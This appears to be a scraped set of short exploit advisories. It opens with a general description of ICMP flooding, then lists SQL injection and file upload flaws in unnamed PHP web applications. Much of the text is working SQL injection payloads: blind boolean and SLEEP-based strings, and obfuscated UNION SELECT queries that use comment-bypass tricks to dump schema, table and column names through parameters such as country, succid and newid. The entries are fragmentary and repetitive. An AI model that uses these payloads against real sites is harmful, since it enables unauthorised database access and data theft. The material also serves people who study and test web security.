ICMP Flooding is a type of Denial of Service attack in which an attacker sends a large number of ICMP packets to a target system with the intention of overwhelming it. This type of attack is usually used to disrupt network services and can be used to target a single host or an entire network. The attacker can use a variety of techniques to send the ICMP packets, such as spoofing the source address, using a botnet, or using a distributed denial of service (DDoS) attack. The target system will be unable to process the large number of ICMP packets and will eventually become unresponsive.
The vulnerability allows an attacker to inject SQL commands into the vulnerable application.
The vulnerability allows users to upload arbitrary files. It exists due to insufficient validation of uploaded files in the 'add_product.php' script. A remote attacker can upload an arbitrary file and execute arbitrary code on the target system.
The vulnerability allows an attacker to inject SQL commands into the vulnerable application.
The vulnerability allows an attacker to inject SQL commands into the 'preview.php' file by appending a malicious SQL query to the 'id' parameter.
The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
http://localhost/[PATH]/city.php?country=[SQL]&state=[SQL]
http://localhost/[PATH]/state.php?country=[SQL]
Parameter: country (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: country=Russian Federation' AND 6933=6933 AND 'kVcM'='kVcM&state=Moskva
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: country=Russian Federation' AND SLEEP(5) AND 'ZbHT'='ZbHT&state=Moskva
The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
http://localhost/[PATH]/success-story.php?succid=[SQL]
-12++/*!04444UNION*/+/*!04444SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139--+-
The vulnerability allows an attacker to inject SQL commands into the 'state_id' and 's' parameters of the 'city_ajax.php' and 'category_list.php' scripts, respectively.
The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
http://localhost/[PATH]/countrycode1.php?val=[SQL]
-1'++/*!07777UNION*/+/*!07777SELECT*/+@@version--+-
The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
http://localhost/[PATH]/news-detail.php?newid=[SQL]
-7'++/*!00008UNION*/(/*!00008SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!00008Select*/+export_set(5,@:=0,(/*!00008select*/+count(*)/*!00008from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00008table_name*/,0x3c6c693e,2),/*!00008column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-